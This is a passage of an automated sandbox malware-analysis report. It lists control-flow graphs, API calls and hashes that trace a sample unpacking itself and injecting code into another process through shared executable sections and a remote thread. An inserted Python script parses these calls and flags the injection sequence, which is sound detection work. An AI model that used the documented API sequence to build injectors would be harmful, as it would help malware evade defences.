                            • String ID: VirtualProtect$}$
                            • API String ID: 693232001-3575559497
                            • Opcode ID: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction ID: 8dbc5d9f7ccbc57e8f3c20c9d260084f9863f046cce8ff7655e10ccfc7c1cc5d
                            • Opcode Fuzzy Hash: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction Fuzzy Hash: B8819072606130AFC721AF61EC49C9F7BACEF4A355B80443AF585D2161DB3C4646CBAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 145 401513-401546 152 401555 145->152 153 40154c-40156b call 401196 145->153 152->153 157 401570-401575 153->157 158 40156d 153->158 160 40157b-40158c 157->160 161 40189d-4018a5 157->161 158->157 164 401592-4015bb 160->164 165 40189b-4018bf 160->165 161->157 164->165 173 4015c1-4015d8 NtDuplicateObject 164->173 169 4018b0-4018bb 165->169 170 4018c2-4018d4 165->170 169->170 174 4018d7 170->174 175 4018ca-4018d0 170->175 173->165 176 4015de-401602 NtCreateSection 173->176 177 4018eb 174->177 178 4018df-4018f7 call 401196 174->178 175->174 179 401604-401625 NtMapViewOfSection 176->179 180 40165e-401684 NtCreateSection 176->180 177->178 179->180 182 401627-401643 NtMapViewOfSection 179->182 180->165 184 40168a-40168e 180->184 182->180 185 401645-40165b 182->185 184->165 187 401694-4016b5 NtMapViewOfSection 184->187 185->180 187->165 188 4016bb-4016d7 NtMapViewOfSection 187->188 188->165 190 4016dd call 4016e2 188->190
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
                            • Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 192 40151e-40156b call 401196 197 401570-401575 192->197 198 40156d 192->198 200 40157b-40158c 197->200 201 40189d-4018a5 197->201 198->197 204 401592-4015bb 200->204 205 40189b-4018bf 200->205 201->197 204->205 213 4015c1-4015d8 NtDuplicateObject 204->213 209 4018b0-4018bb 205->209 210 4018c2-4018d4 205->210 209->210 214 4018d7 210->214 215 4018ca-4018d0 210->215 213->205 216 4015de-401602 NtCreateSection 213->216 217 4018eb 214->217 218 4018df-4018f7 call 401196 214->218 215->214 219 401604-401625 NtMapViewOfSection 216->219 220 40165e-401684 NtCreateSection 216->220 217->218 219->220 222 401627-401643 NtMapViewOfSection 219->222 220->205 224 40168a-40168e 220->224 222->220 225 401645-40165b 222->225 224->205 227 401694-4016b5 NtMapViewOfSection 224->227 225->220 227->205 228 4016bb-4016d7 NtMapViewOfSection 227->228 228->205 230 4016dd call 4016e2 228->230
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
                            • Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 401553-40156b call 401196 238 401570-401575 232->238 239 40156d 232->239 241 40157b-40158c 238->241 242 40189d-4018a5 238->242 239->238 245 401592-4015bb 241->245 246 40189b-4018bf 241->246 242->238 245->246 254 4015c1-4015d8 NtDuplicateObject 245->254 250 4018b0-4018bb 246->250 251 4018c2-4018d4 246->251 250->251 255 4018d7 251->255 256 4018ca-4018d0 251->256 254->246 257 4015de-401602 NtCreateSection 254->257 258 4018eb 255->258 259 4018df-4018f7 call 401196 255->259 256->255 260 401604-401625 NtMapViewOfSection 257->260 261 40165e-401684 NtCreateSection 257->261 258->259 260->261 263 401627-401643 NtMapViewOfSection 260->263 261->246 265 40168a-40168e 261->265 263->261 266 401645-40165b 263->266 265->246 268 401694-4016b5 NtMapViewOfSection 265->268 266->261 268->246 269 4016bb-4016d7 NtMapViewOfSection 268->269 269->246 271 4016dd call 4016e2 269->271
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
                            • Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 273 402fd3-402ff7 274 40312a-40312f 273->274 275 402ffd-403015 273->275 275->274 276 40301b-40302c 275->276 277 40302e-403037 276->277 278 40303c-40304a 277->278 278->278 279 40304c-403053 278->279 280 403075-40307c 279->280 281 403055-403074 279->281 282 40309e-4030a1 280->282 283 40307e-40309d 280->283 281->280 284 4030a3-4030a6 282->284 285 4030aa 282->285 283->282 284->285 287 4030a8 284->287 285->277 286 4030ac-4030b1 285->286 286->274 288 4030b3-4030b6 286->288 287->286 288->274 289 4030b8-403127 RtlCreateUserThread NtTerminateProcess 288->289 289->274
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateProcessTerminateThreadUser
                            • String ID:
                            • API String ID: 1921587553-0
                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9
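The seven NTDLL calls listed for the 401513 function (the same body is dumped three times above, entered at 401513, 40151e and 401553) and the RtlCreateUserThread / NtTerminateProcess pair in the 402fd3 graph are the parts of this report a detection engineer will want to read as one sequence. What follows is an added example, not code from the report or from the sample: it parses the report's own `Name.Module(args), ref: VA` lines, names the argument positions that matter using the documented ntdll prototypes (NtCreateSection: DesiredAccess, SectionPageProtection, AllocationAttributes, FileHandle; NtMapViewOfSection: ProcessHandle and Win32Protect; NtDuplicateObject: SourceHandle, TargetProcessHandle, Options), and applies an order-based rule for the section-mapping injection primitive. Two assumptions are labelled in the code: that the IDA plugin renders a `push -1` immediate as 000000FF, so that value is read as the NtCurrentProcess() pseudo-handle; and the RtlCreateUserThread input line, which is constructed because the report shows that call only as graph block 4030b8-403127 without arguments.

```python
"""Added example (not part of the Joe Sandbox report): parse the 'APIs' lines
printed for function 401513, decode the section-API arguments into named
flags, and run an order-based rule for section-mapping injection."""
import re
from typing import Dict, List, Optional

# One call per line: Name.Module(arg,arg,...), ref: VA   ('?' = unresolved arg)
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXEC_MASK = 0xF0  # any of the four PAGE_EXECUTE* bits
SECTION_ACCESS = {0x1: "SECTION_QUERY", 0x2: "SECTION_MAP_WRITE",
                  0x4: "SECTION_MAP_READ", 0x8: "SECTION_MAP_EXECUTE"}
SEC_ALLOC = {0x01000000: "SEC_IMAGE", 0x04000000: "SEC_RESERVE",
             0x08000000: "SEC_COMMIT", 0x10000000: "SEC_NOCACHE"}
DUP_OPTS = {0x1: "DUPLICATE_CLOSE_SOURCE", 0x2: "DUPLICATE_SAME_ACCESS",
            0x4: "DUPLICATE_SAME_ATTRIBUTES"}
# Assumption: the plugin prints a `push -1` (6A FF) immediate as 000000FF, so
# both renderings are taken as the NtCurrentProcess() pseudo-handle.
SELF_HANDLES = {0xFF, 0xFFFFFFFF}


def parse_call(line: str) -> Optional[Dict]:
    """Turn one report line into {name, module, args, ref}; None if it is not an API line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m["args"]
    args = [] if not raw else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
    return {"name": m["name"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)}


def flags(value: Optional[int], table: Dict[int, str]) -> str:
    """Render a bitmask with the names in `table`, or the raw hex if no bit matched."""
    if value is None:
        return "?"
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def describe(call: Dict) -> str:
    """Name the argument positions that matter for the three injection APIs."""
    n, a = call["name"], call["args"]
    if n == "NtDuplicateObject" and len(a) >= 7:
        src = "pseudo-handle(-1)" if a[1] in SELF_HANDLES else "handle"
        tgt = "self" if a[2] in SELF_HANDLES else "other"
        return f"NtDuplicateObject source={src} into={tgt} opts={flags(a[6], DUP_OPTS)}"
    if n == "NtCreateSection" and len(a) >= 7:
        backing = "pagefile" if a[6] == 0 else "file"
        return (f"NtCreateSection access={flags(a[1], SECTION_ACCESS)} "
                f"prot={flags(a[4], PAGE_PROT)} attrs={flags(a[5], SEC_ALLOC)} backing={backing}")
    if n == "NtMapViewOfSection" and len(a) >= 10:
        target = "self" if a[1] in SELF_HANDLES else "remote/unknown"
        return f"NtMapViewOfSection target={target} prot={flags(a[9], PAGE_PROT)}"
    return n


def detect_section_injection(calls: List[Dict]) -> List[str]:
    """Rule: a pagefile-backed section created with execute protection, mapped
    into the current process and then into another process with an executable
    protection, is the map-and-execute injection primitive; a remote thread
    created after that marks the hand-off of control."""
    findings, exec_section, mapped_local = [], False, False
    for c in calls:
        n, a = c["name"], c["args"]
        if n == "NtCreateSection" and len(a) >= 7 and a[4] is not None:
            exec_section, mapped_local = bool(a[4] & EXEC_MASK) and a[6] == 0, False
        elif n == "NtMapViewOfSection" and exec_section and len(a) >= 10:
            if a[1] in SELF_HANDLES:
                mapped_local = True
            elif mapped_local and a[9] is not None and a[9] & EXEC_MASK:
                findings.append(f"executable section mapped into another process at {c['ref']:08X}")
        elif n in ("RtlCreateUserThread", "NtCreateThreadEx") and findings:
            findings.append(f"remote thread created after shared mapping at {c['ref']:08X}")
    return findings


# Lines 1-7 are verbatim from the report; line 8 is constructed (the report
# shows RtlCreateUserThread only as block 4030b8-403127, without arguments).
REPORT_LINES = """\
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
• RtlCreateUserThread.NTDLL(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 004030B8
""".splitlines()

CALLS = [c for c in map(parse_call, REPORT_LINES) if c]
FINDINGS = detect_section_injection(CALLS)

if __name__ == "__main__":
    for c in CALLS:
        print(f"{c['ref']:08X}  {describe(c)}")
    print("\n".join(FINDINGS) or "no injection pattern")
```

Run as a script it prints each decoded call and then the findings. The rule deliberately keys on the second NtCreateSection (PAGE_EXECUTE_READWRITE, SEC_COMMIT, no file handle) followed by a mapping into the caller and then a mapping into an unresolved process handle with PAGE_EXECUTE_READ, which is exactly the 0040167F, 004016B0 and 004016D2 call sites above; the earlier PAGE_READWRITE section at 004015FD does not trip it on its own, so a shared-memory pattern without execute protection stays quiet. The 0xFF handling also makes the NtDuplicateObject arguments readable: a source handle of -1 duplicated with DUPLICATE_SAME_ACCESS is the argument shape of duplicating a process's own pseudo-handle into the caller.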

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 291 403149-40314e 292 403150-403151 291->292 293 403152-403156 291->293 292->293 294 403157-403172 293->294 295 4030fe-403127 RtlCreateUserThread NtTerminateProcess 293->295 299 403174 294->299 296 40312a-40312f 295->296 300 403176 299->300 301 40317d-403182 299->301 300->301 304 403178 300->304 302 403184 301->302 303 40318a-403192 call 40120f 301->303 302->303 305 403186-403189 302->305 303->299 308 403196-4031ac 303->308 304->301 305->303 311 4031b0 308->311 311->311
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
                            • Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 6d003c-6d0047 61 6d004c-6d0263 call 6d0a3f call 6d0e0f call 6d0d90 VirtualAlloc 60->61 62 6d0049 60->62 77 6d028b-6d0292 61->77 78 6d0265-6d0289 call 6d0a69 61->78 62->61 80 6d02a1-6d02b0 77->80 82 6d02ce-6d03c2 VirtualProtect call 6d0cce call 6d0ce7 78->82 80->82 83 6d02b2-6d02cc 80->83 89 6d03d1-6d03e0 82->89 83->80 90 6d0439-6d04b8 VirtualFree 89->90 91 6d03e2-6d0437 call 6d0ce7 89->91 93 6d04be-6d04cd 90->93 94 6d05f4-6d05fe 90->94 91->89 96 6d04d3-6d04dd 93->96 97 6d077f-6d0789 94->97 98 6d0604-6d060d 94->98 96->94 100 6d04e3-6d0505 96->100 101 6d078b-6d07a3 97->101 102 6d07a6-6d07b0 97->102 98->97 103 6d0613-6d0637 98->103 112 6d0517-6d0520 100->112 113 6d0507-6d0515 100->113 101->102 104 6d086e-6d08be LoadLibraryA 102->104 105 6d07b6-6d07cb 102->105 106 6d063e-6d0648 103->106 111 6d08c7-6d08f9 104->111 108 6d07d2-6d07d5 105->108 106->97 109 6d064e-6d065a 106->109 114 6d0824-6d0833 108->114 115 6d07d7-6d07e0 108->115 109->97 110 6d0660-6d066a 109->110 116 6d067a-6d0689 110->116 118 6d08fb-6d0901 111->118 119 6d0902-6d091d 111->119 120 6d0526-6d0547 112->120 113->120 117 6d0839-6d083c 114->117 121 6d07e4-6d0822 115->121 122 6d07e2 115->122 123 6d068f-6d06b2 116->123 124 6d0750-6d077a 116->124 117->104 125 6d083e-6d0847 117->125 118->119 126 6d054d-6d0550 120->126 121->108 122->114 129 6d06ef-6d06fc 123->129 130 6d06b4-6d06ed 123->130 124->106 131 6d0849 125->131 132 6d084b-6d086c 125->132 127 6d0556-6d056b 126->127 128 6d05e0-6d05ef 126->128 134 6d056d 127->134 135 6d056f-6d057a 127->135 128->96 136 6d06fe-6d0748 129->136 137 6d074b 129->137 130->129 131->104 132->117 134->128 138 6d057c-6d0599 135->138 139 6d059b-6d05bb 135->139 136->137 137->116 144 6d05bd-6d05db 138->144 139->144 144->126
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6d0000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: cess$kernel32.dll
                            • API String ID: 4275171209-1230238691
                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction ID: 5ebbe460fe37c58c253ed573dd18450252dbf76ec07c608bcbb3694c3860dc94
                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction Fuzzy Hash: 23525874E012299FDB64CF58C985BA8BBB1BF09304F1480DAE94DAB351DB30AA95DF14

                            Control-flow Graph

                            • Graph image not reproduced. Function at 6fc3e8, blocks 6fc3e8-6fc446: CreateToolhelp32Snapshot, then Module32First on the snapshot, with an internal call to 6fc0a7 on the success path.
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FC410
                            • Module32First.KERNEL32(00000000,00000224), ref: 006FC430
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F9000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6f9000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFirstModule32SnapshotToolhelp32
                            • String ID:
                            • API String ID: 3833638111-0
                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction ID: 096d592d9de0d3ca72be8c1fd2eb845cbabe018a147b545c6b69286852a077a8
                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction Fuzzy Hash: 0FF0C23210031CABD7203BB8AD9DABE76EAAF98330F100128E742D11C0CB70E8054661

                            Control-flow Graph

                            • Graph image not reproduced. Function at 6d0e0f, blocks 6d0e0f-6d0e2c: two consecutive SetErrorMode calls, then return.
                            APIs
                            • SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
                            • SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6d0000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction ID: d737391412cb78383b34bd059ac362a3996041c191b4104b2eff9d787dbb4a53
                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction Fuzzy Hash: C7D0123154512877D7102A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

                            Control-flow Graph

                            • Graph image not reproduced. Function at 423467, single block 423467-423484: VirtualProtect.
                            APIs
                            • VirtualProtect.KERNELBASE(00000040,?,?,?,00423A9B), ref: 0042347D
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction ID: cd11079ae9fe1b66df236ae7ddbd13e2ea7dadf25881c3163ba94d66086d63c1
                            • Opcode Fuzzy Hash: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction Fuzzy Hash: 5CC08CB1140109FFCF018B81EC06E593BADE300308F001131B701A1070C271AA21AB1D

                            Control-flow Graph

                            • Graph image not reproduced. Entry 40192a, blocks 40192a-4019b8: call 401196, Sleep, call 40141a; on one branch call 401513; then call 401196 again.
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
                            • Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

                            Control-flow Graph

                            • Graph image not reproduced. Entry 4018fa, blocks 4018fa-4019b8: call 401196, Sleep, call 40141a; on one branch call 401513; then call 401196 again.
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
                            • Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

                            Control-flow Graph

                            • Graph image not reproduced. Entry 401906, blocks 401906-4019b8: call 401196, Sleep, call 40141a; on one branch call 401513; then call 401196 again.
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
                            • Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

                            Control-flow Graph

                            • Graph image not reproduced. Entry 401937, blocks 401925-4019b8: 401937-40193b then 401925-401939 lead into 40193c, which calls 401196, Sleep and 40141a; on one branch call 401513; then call 401196 again.
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
                            • Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

                            Control-flow Graph

                            • Graph image not reproduced. Entry 401926, blocks 401926-4019b8: call 401196, Sleep, call 40141a; on one branch call 401513; then call 401196 again.
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
